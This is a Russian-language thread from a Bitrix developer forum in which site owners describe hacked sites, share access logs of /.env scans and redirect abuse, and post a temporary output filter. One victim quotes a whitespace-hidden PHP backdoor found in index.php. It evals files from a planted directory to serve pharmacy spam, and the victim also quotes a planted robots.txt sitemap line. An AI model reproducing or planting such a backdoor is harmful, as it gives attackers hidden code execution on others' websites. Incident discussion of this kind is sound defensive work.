Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Пользователь 7923188 Заглянувший Сообщений: 5 Регистрация: 12.02.2024	#881 0 12.02.2024 08:59:30 Написал Вам в личку ссылку

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#882

12.02.2024 09:06:46

Цитата
Андрей Молодцов написал: Написал Вам в личку ссылку

походил по каталогу - не моделируется

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 108671 Постоянный посетитель Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011	#883 0 12.02.2024 09:10:15 дайте ссылку на сайт. Нет такого зверя, которого невозможно пристрелить ))

Пользователь 7923188 Заглянувший Сообщений: 5 Регистрация: 12.02.2024	#884 0 12.02.2024 09:26:06 Отправил ссылку в личку

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

#885

12.02.2024 09:36:44

Цитата

написал:

Цитата
Максим Егоров написал: У нас версия 7.9

понятно, значит не то ...
так и не нашли дыру?

Нет. Восстановили бэкап до взлома, сейчас не появляется, а причину пока не нашли.

У нас на странице подключается googletagmanager 5 раз и что удивительно все сводится в папку include от Астора. В трех местах подключается, где их компонент соц сетей подгружается и под баннером с меню футера. Посмотреть, что в include файлах в зараженном бэкапе не можем, потому что у нас многосайтовость и сортировка выше у второго сайта, их файлы развернулись.

И тут такой момент, что в админке тоже появлялась "капча", но стоит оговориться, что в админке стало появляться не сразу, только на второй день.

Еще из интересных логах за тот день, когда заметили вирус:

Код

78.153.140.224 - -[04/Feb/2024:01:51:14 +0300 - -] 301 "GET /.env HTTP/1.1" 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [04/Feb/2024:01:51:14 +0300 - -] 400 "\x16\x03\x01\x00\xDE\x01\x00\x00\xDA\x03\x03\xF6\x1CK\xAB\x0E\x02YU\x95v\x0E\x17d(\x1D\xE4H\x01G%\x0Fi\x85" 150 "-" "-" "-"
78.153.140.224 - - [04/Feb/2024:01:51:14 +0300 - 0.174] 404 "GET /.env HTTP/1.1" 70555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [03/Feb/2024:13:32:43 +0300 - -] 302 "GET /.env HTTP/1.1" 138 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [03/Feb/2024:13:32:44 +0300 - 0.174] 404 "GET /.env HTTP/1.1" 70557 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [03/Feb/2024:13:32:44 +0300 - 0.172] 404 "GET /.env HTTP/1.1" 70558 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
68.183.140.104 - - [04/Feb/2024:02:02:01 +0300 - -] 400 "\x15\x03\x03\x00\x02\x02F" 150 "-" "-" "-"
68.183.140.104 - -[04/Feb/2024:02:02:02 +0300 - 0.000] 403 "GET /bitrix/redirect.php?goto=http://orgausa.com HTTP/1.1" 242 "https://***.ru/bitrix/redirect.php?goto=http://orgausa.com" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68" "-"
198.235.24.16 - - [04/Feb/2024:02:19:53 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "-" "-"
198.235.24.16 - - [04/Feb/2024:02:19:55 +0300 - 0.001] 400 "GET / HTTP/1.1" 407 "http://наш ip:80/" "-" "-"

P.S. Сегодня на другом сайте ночью пытались массово удалить пользователей и не удалось из-за настроек битрикса:

a:2:{s:4:"user";s:29:"Дмитрий ***";s:3:"err";s:206:"Ошибка при удалении в модуле sale: Пользователь #10429 имеет заказы в модуле Интернет-магазина и не может быть удален.";}

Пару дней уже на этом сайте боты массово заполняют формы, да и во всех инпутах, каких можно sql-инъекции ищут

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

#886

12.02.2024 09:38:01

Цитата

написал:

Цитата
Андрей Молодцов написал: Написал Вам в личку ссылку

походил по каталогу - не моделируется

Он появляется с определенной периодичностью и не надолго. У нас обычно в районе 15:00 по МСК появлялся, ну и понятно, что до и после тоже

Пользователь 7923188

Заглянувший

Сообщений: 5 Регистрация: 12.02.2024

#887

12.02.2024 09:44:54

Нам уже написали сотни клиентов. с десятков компьютеров в офисе одно и то же и она ранее реже появлялась а сейчас все чаще. сброс кеша помогает на несколько минут и снова появляется. во вкладке инкогнито то же самое.

На другом проекте хостинг заблокировал сайт на битрикс из-за большого количества исходящих запросов. Пытаюсь получить больше информации об этом.

Пользователь 7923188

Заглянувший

Сообщений: 5 Регистрация: 12.02.2024

#888

12.02.2024 11:24:21

в init.php
прописал
AddEventHandler("main", "OnEndBufferContent", "RemoveMaliciousCode");

// Функция для удаления вредоносного кода
function RemoveMaliciousCode(&$content) {
// Замените 'вредоносный_код' на фактический код или часть его, который вы хотите удалить
$maliciousCode = "'https://www.googletagmanager.com/gtm.js?id=',";
// Поиск и удаление вредоносного кода
$content = str_replace($maliciousCode, "", $content);
}

Капча перестала появляться в консоли браузера появилась ошибка о том что не может она. можно дальше копать. Временная заплатка пока не найдем источник

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#889

12.02.2024 11:33:30

Цитата

написал:
Нам уже написали сотни клиентов. с десятков компьютеров в офисе одно и то же и она ранее реже появлялась а сейчас все чаще. сброс кеша помогает на несколько минут и снова появляется. во вкладке инкогнито то же самое.

Не получилось смоделировать ситуацию.
А вы пробовали:
1. Просканировать сайт встроенной проактивной защитой? Покажите протокол.
2. Скачать его локально и прогнать, например, Доктор Вебом?

Пользователь 361229

Постоянный посетитель

Сообщений: 81 Баллов: 16 Регистрация: 18.07.2015

#890

12.02.2024 12:17:22

Устал бороться. Битрикс – решето, сплошные разочарования! Стоит не дешево, а проблем получаешь вагон.

Одну проблему закроешь, вторая следом возникает. Битрикс + Аспро.NEXT – чего только не было за историю работы сайта.

Начиная от редиректов ?goto=, заканчивая шелами, и появлением новых директорий со скриптами в корне сайта. Обновления особо не помогают. Дверь закроешь, они в окно.

Сайт похоже в какой-то спам базе – устал бороться с ботами. Но очередной взлом добил окончательно!

Периодически смотрю логи, и вот опять – вижу огромное количество - обращений, GET запросов типа:

Код
/?ko=dejstvie_sialis_na_muzhskoj_organizm.php HTTP/1.0" 200 36384 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

При переходе по ссылке на моем сайте, с моим доменным именем открываются страницы другого сайта, каталог препаратов для импотентов: виагрой и прочей фигней.

Началось все с этого:

Код

127.0.0.1 - - [12/Feb/2024:02:10:43 +0000] "GET /lib/tools/coc/ HTTP/1.0" 200 36240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
127.0.0.1 - - [12/Feb/2024:02:10:43 +0000] "GET /lib/tools/coc/ HTTP/1.0" 200 36240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
127.0.0.1 - - [12/Feb/2024:02:10:44 +0000] "GET /lib/tools/coc/ HTTP/1.0" 200 36240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Обнаружил новую директорию с /lib/ - в корне сайта, с большим количеством PHP - файлов, страниц данного левого сайта.

Как подсадили, не догадываюсь. Убрал.

Понимаю, что просто убрать мало, так как сама проблема окончательно не решена, дыра не закрыта.

Прошу совета! Как решить проблему окончательно? Куда смотреть?

PS: Ещё нашел в файле index.php в корне, сразу после открывающей директивы <? вставку кода:

Код

error_reporting(0); ini_set('display_errors', 'Off'); if(isset($_GET['ko'])) { header('Content-Type: text/html; charset=utf-8'); 
$p=array_pop(@preg_split("!\/!",$_GET['ko'])); echo eval/**/('?>'.join("",file("lib/tools/coc/$p")).'<?'); die; }?>

Причем сдвинута в право с большим количеством пробелов, что бы при открытии файла была не заметна.

PS: Ещё в файл robots.txt добавили строку:

Код
Sitemap: https://my-site.ru/lib/tools/coc/sitemap.xml

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером